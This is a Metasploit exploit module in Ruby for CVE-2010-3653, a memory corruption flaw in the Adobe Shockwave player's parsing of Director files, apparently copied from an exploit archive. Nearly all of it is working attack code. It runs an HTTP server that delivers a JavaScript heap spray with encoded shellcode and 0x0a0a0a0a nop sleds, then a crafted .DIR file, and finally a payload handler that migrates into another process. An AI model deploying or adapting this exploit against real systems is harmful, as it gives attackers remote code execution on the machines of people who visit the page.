|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138  |  ## # $Id: adobe_shockwave_rcsl_corruption.rb 10784 2010-10-22 12:21:30Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = NormalRanking  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})  super(update_info(info,  'Name' => 'Adobe Shockwave rcsL Memory Corruption',  'Description'=> %q{  This module exploits a weakness in the Adobe Shockwave player's handling of  Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented  rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.  },  'License'=> MSF_LICENSE,  'Author' => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>'],  'Version'=> '$Revision: 10784 $',  'References' =>  [  [ 'CVE', '2010-3653'],  [ 'OSVDB', '68803'],  [ 'URL', 'https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15296.zip' ],  ],  'DefaultOptions' =>  {  'InitialAutoRunScript' => 'migrate -f'  },  'Payload'=>  {  'Space' => 1024,  'BadChars'=> "\x00\x09\x0a\x0d",  },  'Platform' => 'win',  'Targets'=>  [  [ 'Automatic', { 'Ret' => 0x0a0a0a0a } ], # tested on XP SP2 and XP SP3  ],  'DisclosureDate' => 'Oct 21 2010',  'DefaultTarget'=> 0))  end  def autofilter  false  end  def check_dependencies  use_zlib  end  #  # When exploit is called, load the exploit.dir file  #  def exploit  path = File.join( Msf::Config.install_root, "data", "exploits", "shockwave_rcsl.dir" )  fd = File.open( path, "rb" )  @dir_data = fd.read(fd.stat.size)  fd.close  super  end  def on_request_uri(cli, request)  # Re-generate the payload  return if ((p = regenerate_payload(cli)) == nil)  # Randomize some things  dirname = rand_text_alpha(rand(20))  shellcode_rand = rand_text_alpha(rand(20))  # payload encoding  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))  # build the exploit  content = %Q| <html> <head> <title>msf</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script> #{shellcode_rand} = unescape('#{shellcode}'); nops=unescape('%u0a0a%u0a0a'); headersize =20; slackspace= headersize + #{shellcode_rand}.length; while(nops.length< slackspace) nops+= nops; fillblock= nops.substring(0, slackspace); block= nops.substring(0, nops.length- slackspace); while( block.length+ slackspace<0x200000) block= block+ block+ fillblock; memory=new Array(); for( counter=0; counter<200; counter++) memory[counter]= block + #{shellcode_rand}; </script> </head> <body bgColor="#FFFFFF"> <object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version=11,5,0,593" ID=Abysssec width=600 height=430 VIEWASTEXT> <param name=src value="#{dirname}.DIR"> <param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' "> <param name=swStretchStyle value=fill> <param name=PlayerVersion value=11> <PARAM NAME=bgColor VALUE=#FFFFFF> <embed src="https://www.exploit-db.com/exploits/16594/#{dirname}.DIR" bgColor=#FFFFFFwidth=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedia.com/shockwave/download/"></embed> </object> </body> </html> |  # Transmit the response to the client  path = request.uri  if (path =~ /\.DIR/i)  print_status("Sending exploit DIR to #{cli.peerhost}:#{cli.peerport}...")  send_response(cli, @dir_data, { 'Content-Type' => 'application/octet-stream' })  else  print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")  send_response_html(cli, content)  end  # Handle the payload  handler(cli)  end end  |